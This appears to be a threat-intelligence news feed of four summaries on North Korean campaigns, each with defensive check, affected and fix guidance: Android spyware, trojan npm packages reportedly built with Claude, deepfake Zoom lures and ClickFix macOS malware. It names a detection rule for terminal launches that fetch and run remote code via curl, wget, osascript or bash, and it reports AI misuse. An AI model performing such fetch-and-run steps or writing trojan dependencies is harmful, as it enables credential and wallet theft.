RSS
Last updated: May 13, 2026 at 5:42 AM UTC
All 208 Vulnerability 72 Breach 41 Threat 88 Defense 7
Tag: dprk (4 articles)Clear
threat
2026-05-06

North Korean hackers built a fake Korean game platform to spread Android spyware targeting ethnic Koreans living in China

ScarCruft (also called APT37 or Reaper) built a fake online gaming platform in Korean to spread BirdCall, a previously undocumented Android malware aimed at ethnic Koreans living in China. The Record reports the platform impersonated legitimate Korean-language game communities. BirdCall harvests device information, contacts, SMS, call logs, photos, and microphone audio - capabilities consistent with surveillance of diaspora communities rather than financial gain. ScarCruft has historically targeted North Korean defectors and journalists with similar Android malware lures.

scarcruftapt37reaperdprkbirdcallandroid-malwareethnic-koreanschinatransnational-repressiondiaspora-targetingfake-gaming-platformcitizen-lab
Check
If your organization works with Korean-language communities or journalists covering North Korea, check Android devices for unfamiliar Korean game apps installed since early 2026. Review app permissions for SMS, contacts, and microphone access.
Affected
Android users in ethnic Korean communities in China, North Korean defectors, journalists covering North Korea, human-rights organizations, and South Korean policy researchers. Diaspora communities are the primary target. Organizations supporting diaspora communities or refugee networks face downstream risk through their constituents.
Fix
On managed Android devices: enforce Google Play Protect, block sideloading of APKs from unknown sources, and require MDM approval for any Korean-language gaming app. For at-risk individuals: reset Android devices that may have installed the fake platform, and use only verified Google Play apps. Follow Citizen Lab guidance for journalists working on North Korea topics.
threat
2026-04-29

North Korean hackers used Claude AI to add malicious npm dependencies to legitimate-looking projects and stole crypto wallet credentials from developers who installed them

North Korea's Famous Chollima group (also called Void Dokkaebi) is using Anthropic's Claude Opus to write malicious npm packages and slip them into developer environments. ReversingLabs found the group had registered a fake Florida LLC, set up a real-looking developer firm, and used Claude to add a package called @validate-sdk/v2 as a dependency to a legitimate-looking utility SDK. When developers installed the parent package, the dependency executed code that stole their cryptocurrency wallet credentials. The campaign progressed from simple JavaScript info-stealers (5KB) to full Node.js executables (85MB) bundling Claude-generated deception code.

dprkfamous-chollimavoid-dokkaebiclaude-opusai-malwarenpmpypicryptocurrencyfake-llcreversinglabs
Check
If your organization handles cryptocurrency, treat every npm or PyPI dependency as untrusted by default - particularly utility SDKs offered by unfamiliar publishers.
Affected
Cryptocurrency companies and developers, especially those whose machines hold wallet credentials, signing keys, or CI/CD access to crypto infrastructure. Web3 startups, blockchain developers, fintech engineers. The targeting is industry-specific, but the technique (AI-generated trojan dependencies inside legitimate-looking SDKs) will be copied by other groups.
Fix
Pin npm and PyPI dependencies to specific commit SHAs and require manual review for any new dependency added to a crypto-handling project. For high-risk developers, use ephemeral build environments that don't carry wallet credentials. Block ipfs-url-validator.vercel[.]app and the @validate-sdk publisher namespace. Treat any 'utility SDK' from an unfamiliar US LLC formed in the past 12 months with extra suspicion.
threat
2026-04-28

North Korean hackers are recording fake Zoom meetings with real crypto executives, then using the footage and AI-generated lookalikes to scam the next target

North Korea's BlueNoroff group has built a self-reinforcing deepfake pipeline that turns each victim into the lure for the next attack. Arctic Wolf documented the pattern: attackers send a Calendly invite that looks like a normal business meeting, then quietly swap the Google Meet link for a typo-squatted Zoom URL. When the target joins, a fake Zoom interface secretly records their webcam feed while a clipboard-injection attack drops malware. The captured footage is mixed with AI-generated lookalikes (built using ChatGPT for synthetic portraits) and recycled into the next attack. Arctic Wolf found 950 files in BlueNoroff's media server. 80% of identified targets are crypto executives.

bluenorofflazarusapt38dprkdeepfakefake-zoomclickfixcryptocurrencyarctic-wolfcalendlysocial-engineering
Check
Brief every executive in your organization that any 'Zoom SDK update' prompt asking them to copy and paste commands into their terminal during a meeting is a North Korean malware drop.
Affected
Cryptocurrency executives, Web3 founders, and CEOs at fintech and blockchain companies - 45% of identified targets are CEOs and founders, 80% are in crypto or adjacent sectors. Anyone whose webcam footage was exfiltrated by BlueNoroff is now appearing as a fake meeting participant targeting their professional network.
Fix
Train executives that any 'SDK update' prompt during a meeting is hostile - real Zoom and Teams never ask users to paste commands into terminals. Verify out-of-band before joining any meeting from an unsolicited Calendly link. Block known BlueNoroff infrastructure (Petrosky Cloud LLC AS400897 and the 80 typosquat domains in Arctic Wolf's IoCs). Consider a dedicated meeting device for high-risk executives.
threat
2026-04-24

Lazarus 'Mach-O Man' macOS malware kit hitting fintech and crypto execs through fake Telegram meeting invites and ClickFix terminal commands

ANY.RUN and Dark Reading published research on Mach-O Man, a new macOS malware kit Lazarus is deploying against fintech and crypto executives. The chain begins on Telegram with what looks like a legitimate meeting invite from a known contact, leading to a fake Zoom/Teams/Meet page that displays a fake 'connection issue' and instructs the executive to copy-paste a command into Mac Terminal. That ClickFix command grabs credentials, browser sessions, and Keychain data and exfiltrates over Telegram bot APIs. Lazarus has used the same template across the Drift and KelpDAO compromises, totaling more than $500M stolen in two weeks.

lazarusdprkmach-o-manmacosclickfixtelegramfintechcryptoany-runsocial-engineering
Check
Brief executive, finance, and treasury staff who use Telegram for business communication this week. The lure is a meeting invite from someone they trust, not a cold approach.
Affected
macOS users in executive, finance, business development, and partner-relations roles - particularly those who use Telegram for business. The technique works because the user runs the command themselves, bypassing most preventive controls including macOS endpoint protection. Mach-O Man is not Lazarus-only; other criminal groups have already adopted the kit.
Fix
Train executives never to copy-paste a 'fix' command into Terminal at a meeting page's request, regardless of how legitimate the invite looks. Log and alert on Terminal launches that fetch and execute remote content via curl, wget, osascript, or bash. Hunt for processes in tight infinite loops with Keychain access. Consider Lockdown Mode for high-risk roles.